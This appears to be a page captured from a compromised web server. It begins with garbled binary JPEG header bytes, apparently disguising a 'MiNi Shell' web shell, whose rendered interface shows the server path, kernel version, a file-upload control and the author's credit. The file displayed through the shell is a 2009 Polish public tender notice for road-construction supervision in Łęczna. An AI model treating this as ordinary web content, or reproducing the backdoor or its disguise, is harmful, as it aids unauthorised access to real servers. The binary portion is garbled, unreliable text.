JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090916/157417-N-2009.html

<p class="kh_header"><b>Łęczna: Sprawowanie funkcji inspektora nadzoru inwestorskiego nad realizacją zadania:
Program Bogdanka - Przebudowa dróg powiatowych o nr 2013L i 1716L wraz z przebudową skrzyżowania w m. Nadrybie poprzez budowę ronda</b><br>
<b>Numer ogłoszenia: 157417 - 2009; data zamieszczenia: 16.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Łęcznej , Al. Jana Pawła II 95, 21-010 Łęczna, woj. lubelskie, tel. 081 7523082/83.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprawowanie funkcji inspektora nadzoru inwestorskiego nad realizacją zadania:
Program Bogdanka - Przebudowa dróg powiatowych o nr 2013L i 1716L wraz z przebudową skrzyżowania w m. Nadrybie poprzez budowę ronda.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: Sprawowanie funkcji inspektora nadzoru inwestorskiego nad realizacją zadania: Program Bogdanka - Przebudowa dróg powiatowych o nr 2013L i 1716L wraz z przebudową skrzyżowania w m. Nadrybie poprzez budowę ronda,tj. zapewnienie nadzoru nad wykonywaniem robót w zakresie: 1)  badania kwalifikacyjne gruntów  2)  zagęszczenie gruntu (koryto, podłoże, nasyp itp.) 3)  badanie kruszyw na podbudowę 4)  zagęszczania podbudowy 5)  akceptacja receptur na betony i masy bitumiczne 6)  badania mas z nawierzchni ( warstwa wiążąca i ścieralna) 7)  pomiar równości warstwy ścieralnej 8)  opracowanie elaboratów odbiorowych 2. Zadania inspektora nadzoru inwestorskiego w trakcie realizacji inwestycji: 1) reprezentowanie  inwestora  na  budowie  przez  sprawowanie kontroli  zgodności jej realizacji z projektem i pozwoleniem  na  budowę, przepisami oraz  zasadami wiedzy technicznej, 2)  załatwienie wszelkich  spraw  formalno - prawnych związanych z prowadzeniem i zakończeniem robót, w tym: a) kompletowanie  dokumentów   niezbędnych dla właściwych organów nadzoru budowlanego  i administracji budowlanej, b) zgłoszenie zakończenia robót, 3)  organizowanie  prac  związanych  z  nadzorem  w  sposób  niepowodujący  zbędnych przerw   w   realizacji   robót   przez   wykonawcę,   wskazana   ilość   dni roboczych na budowie -minimum 12 dni w miesiącu w czasie prowadzenia  robót oraz na każde wezwanie inwestora, 4) systematyczne dokonywanie wpisów do dziennika budowy, 5) sprawdzanie  jakości  wykonywanych robót  i wbudowanych wyrobów  budowlanych, a  w szczególności  zapobieganie  zastosowaniu  wyrobów  budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie, 6) sprawdzanie  i   odbiór   robót   budowlanych   ulegających   zakryciu   lub  zanikających, uczestniczenie w próbach i odbiorach technicznych, odbiorach częściowych, 7) wydawanie  kierownikowi  budowy  lub  kierownikowi  robót  poleceń,  potwierdzonych wpisem do	dziennika	budowy, dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub   badań, także wymagających odkrycia robót lub elementów zakrytych, oraz  przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych i dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych oraz urządzeń technicznych, 8) Żądanie   od   kierownika budowy lub kierownika robót   dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, a  także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich  kontynuacja mogła wywołać zagrożenie bądź  spowodować niedopuszczalną   niezgodność z projektem lub pozwoleniem na budowę. 9) wnioskowanie  do  inwestora  w  sprawach  dotyczących  wprowadzenia  niezbędnych zmian   w   dokumentacji   technicznej   i   uzyskania   zgody   projektanta   na   zmiany, przeprowadzania niezbędnych ekspertyz i badań technicznych oraz w innych ważnych sprawach finansowych i prawnych, 10)  uzyskiwanie od projektanta wyjaśnień wątpliwości dotyczących projektu i zawartych w nim rozwiązań, 11)  udzielanie wykonawcy informacji, wyjaśnień i wskazówek dotyczących realizacji zamówienia, 12)  organizowanie  narad  koordynacyjnych  (Rada  Budowy),  sporządzania  protokołów z  narad  i  przekazywania  ich  zainteresowanym  stronom  (wykonawcy  i  inwestorowi) w terminie 5 dni po naradzie oraz prowadzenia dokumentacji ze wszystkich kontaktów z wykonawcą, 13)  udział w prowadzeniu ewentualnych negocjacji	w konfliktach z władzami samorządowymi i mieszkańcami, 14)  składanie  inwestorowi  pisemnych  miesięcznych  raportów  z  działalności  obejmującej prowadzenie   nadzoru   robót   oraz   z   realizacji   inwestycji   wraz   z   dokumentacją zdjęciową we  współpracy z wykonawcą robót, będących nieodłącznym załącznikiem do faktur wystawianych przez inspektora nadzoru, 15)  dokonywanie	analizy i	opiniowanie przedstawionych przez wykonawcę harmonogramów w celu ich akceptacji przez inwestora, 16)  sprawdzanie miesięcznych zestawień wykonawcy, wartości zakończonych
i  odebranych  robót,  potwierdzenie  kwot  do  wypłaty, 17)  opiniowanie organizacji ruchu, oznakowania i ustalania długości odcinków roboczych wyłączonych z ruchu, 18)  kontrolowanie stosowania przez wykonawcę przepisów dotyczących ochrony środowiska naturalnego. 19)  kontrolowanie przestrzegania przez wykonawcę zasad BHP, 20)  wstrzymanie   robót   w   przypadku   prowadzenia   ich   niezgodnie   z   zamówieniem i przepisami BHP,
21)  Żądanie   usunięcia   z   placu   budowy   osób   niekompetentnych   lub   innych   osób zatrudnionych przez wykonawcę, 22)  dopilnowanie zapewnienia ubezpieczenia budowy przez wykonawcę, 23)  zajmowanie   stanowiska   co   do sposobu zabezpieczenia wszelkich wykopalisk odkrytych przez wykonawcę na placu budowy, 24)  ustalanie metod obmiaru robót oraz uczestniczenia przy dokonywaniu obmiarów robót przez wykonawcę, 25)  akceptowanie  urządzeń i  sprzętu  pomiarowego  stosowanego  w czasie prowadzenia robót i ich obmiaru, 26)  inspekcja  laboratorium  wykonawcy  w  celu  sprawdzenia,  czy  stosowane  urządzenia pomiarowe  i  sprzęt  laboratoryjny  posiadają  ważną  legalizację,  zostały  prawidłowo wykalibrowane i odpowiadają wymaganiom norm określających procedury badań, 27)  sprawdzanie pomiarów i badań materiałów w	miejscach wyprodukowania i na placu budowy bez względu na to, czy od wykonawcy wymaga się prowadzenia badań w ramach zamówienia oraz żądanie wykonania badań dodatkowych, a przede wszystkim: a) akceptacja materiałów zgodnych z wymaganiami ST ze wskazanych przez wykonawcę źródeł, b) podejmowanie  decyzji  o  dopuszczeniu  do  użycia  materiałów  posiadających atest producenta,
c) akceptowanie receptur i technologii zgodnie wymaganiami ST, d) kontrolowanie  wytwórni  materiałów,  prefabrykatów  mas  bitumicznych  w  celu sprawdzenia zgodności i akceptacji stosowanych metod wytwarzania, e) kontrolowanie sposobu składowania i przechowywania materiałów oraz uporządkowania miejsc po zakończeniu robót,	zlecanie wykonawcy przeprowadzenia	 dodatkowych badań materiałów budzących wątpliwości co do jakości, 28)  wykonywanie  w  ramach  prowadzonego  nadzoru,  bez  dodatkowego  wynagrodzenia, sprawdzających badań laboratoryjnych inwestycji zgodnie z wymaganiami Specyfikacji Technicznych Wykonania i Odbioru Robót w zakresie przewidzianym dla inspektora  nadzoru  (badania laboratoryjne  wykonać należy w laboratorium  polowym zorganizowanym na placu budowy dla	badań podstawowych oraz badań specjalistycznych, w laboratorium stałym własnym lub wynajętym), 29)  wykonanie pomiarów i badań laboratoryjnych do opracowania elaboratów końcowych, ewentualnie  zlecenia  tych  czynności  niezależnemu  laboratorium  akceptowanemu przez inwestora i dokonanie oceny wyników badań pomiarów, 30) sprawdzanie  wykonanych  robót  i  powiadamianie  wykonawcy  o  wykrytych  wadach oraz  poświadczanie  usunięcia  wad  przez  wykonawcę,  a  także  ustalania  rodzaju i zakresu koniecznych do wykonania robót poprawkowych,
31)  stwierdzenie  zakończenia  robót,  sprawdzenie  kompletności  i  prawidłowości  operatu kolaudacyjnego  i  przedłożenie  do  akceptacji  inwestora  w  celu  ustalenia  terminu ostatecznego odbioru robót oraz uczestniczenie w odbiorze, 32)  poświadczenie terminu zakończenia robót, 33) sprawdzanie prawidłowości ustalenia  ostatecznej   kwoty   należnej   wykonawcy,   ustalania   i   wnioskowania zakresu   koniecznych   korekt   wyliczeń   wykonawcy   i   przedstawienia   inwestorowi do podjęcia decyzji o ostatecznej wysokości tej kwoty (w	ciągu 20 dni od otrzymania rozliczenia wykonawcy), 34)  bieżące  informowanie  inwestora  o  wszelkich  problemach  związanych  z  realizacją
inwestycji, 35)  inne zadania wynikające  z  przepisów prawa.
3. Zadania inspektora nadzoru w czasie trwania okresu gwarancyjnego.
1) dokonywanie systematycznych przeglądów zrealizowanych robót co 12 m-cy,
2) zbieranie zgłoszeń dotyczących wad zaistniałych w okresie gwarancyjnym,
3) zgłaszanie wykonawcy zaistniałych wad i ustalanie terminów ich usuwania.
4) nadzorowanie  realizacji  robót  związanych  z  usuwaniem  wad  zaistniałych  w  okresie gwarancyjnym i poświadczanie ich wykonania,
5) ocena wykonanych robót w okresie gwarancyjnym,
6) potwierdzenie ostatecznego rozliczenia po okresie gwarancyjnym,
7) sprawdzenie kompletności	i prawidłowości przedstawionych przez	wykonawcę
dokumentów do odbioru ostatecznego	i przedstawienia wniosku inwestorowi
w celu ustalenia terminu odbioru pogwarancyjnego,
8) inne zadania wynikające  z  przepisów prawa..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy:
1) spełniają warunki określone w art. 22 ust. 1 ustawy,
2) zrealizowali w okresie  ostatnich trzech lat  przed dniem  wszczęcia postępowania, a jeżeli  okres  prowadzenia  działalności  jest  krótszy -  w tym  okresie,  co najmniej jedno zamówienie odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia, tj. nadzorowali roboty w zakresie przebudowy drogi o wartości brutto min. 10 mln zł,
3) dysponują osobą posiadającą uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w	budownictwie - do	kierowania i nadzorowania  robót  drogowych  bez  ograniczeń,  legitymującą  się  co  najmniej
5-letnim  doświadczeniem  zawodowym,  należącą  do  właściwej  izby  samorządu zawodowego,
4) spełniają pozostałe warunki określone w niniejszej SIWZ.
Ocena  spełnienia  warunków  dokonana  zostanie  na  podstawie  złożonych  oświadczeń i dokumentów wymienionych w rozdziałach VI i X niniejszej SIWZ - za pomocą formuły: spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawcy  wraz  z  ofertą  przedłożą  oświadczenie  o  spełnianiu  warunków  określonych w art. 22 ust. 1 ustawy, złożone na formularzu stanowiącym załącznik Nr 2 do SIWZ, a w celu potwierdzenia spełniania tych warunków następujące dokumenty:
1)  aktualny  odpis  z  właściwego  rejestru  albo  aktualne  zaświadczenie  o  wpisie do  ewidencji  działalności  gospodarczej,  jeśli  odrębne  przepisy  wymagają  wpisu do  rejestru  lub  zgłoszenia  do  ewidencji  działalności  gospodarczej,  wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2)  wykaz  wykonanych  usług  w okresie  ostatnich  trzech  lat  przed  dniem  wszczęcia postępowania,  a  jeżeli  okres  prowadzenia  działalności  jest  krótszy  - w  tym okresie,   odpowiadających   swoim   rodzajem   i   wartością   usłudze   stanowiącej przedmiot  zamówienia,  z  podaniem  ich  wartości,  przedmiotu,  dat  wykonania
i  odbiorców,  wraz  z  dokumentami  potwierdzającymi  ich  należyte  wykonanie,
w tym wykazanie co najmniej jednej usługi w zakresie nadzorowania przebudowy drogi  o  wartości  robót  brutto  min.  10  mln  zł  brutto,  złożony  na  formularzu stanowiącym załącznik Nr 4 do niniejszej SIWZ,
3) pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia w przypadku, gdy wykonawca sam nie dysponuje takim potencjałem,
4)  wykaz osób, które będą	uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji	zawodowych, doświadczenia i   wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych  przez  nich  czynności,  złożony  na  formularzu  stanowiącym załącznik Nr 5 do SIWZ, z załączeniem dokumentów stwierdzających, że   osoby   te   posiadają   wymagane   uprawnienia   budowlane   do   kierowania
i  nadzorowania  robót  drogowych  bez  ograniczeń  oraz,  że  posiadają  aktualne członkostwo we właściwej izbie samorządu zawodowego.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://zdpleczna.bip.e-zeto.com.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd dróg Powiatowych w Łęcznej al. Jana Pawła II 95 21-010 Łęczna.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2009 godzina 09:00, miejsce: Zarząd dróg Powiatowych w Łęcznej al. Jana Pawła II 95 21-010 Łęczna pokój 307.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com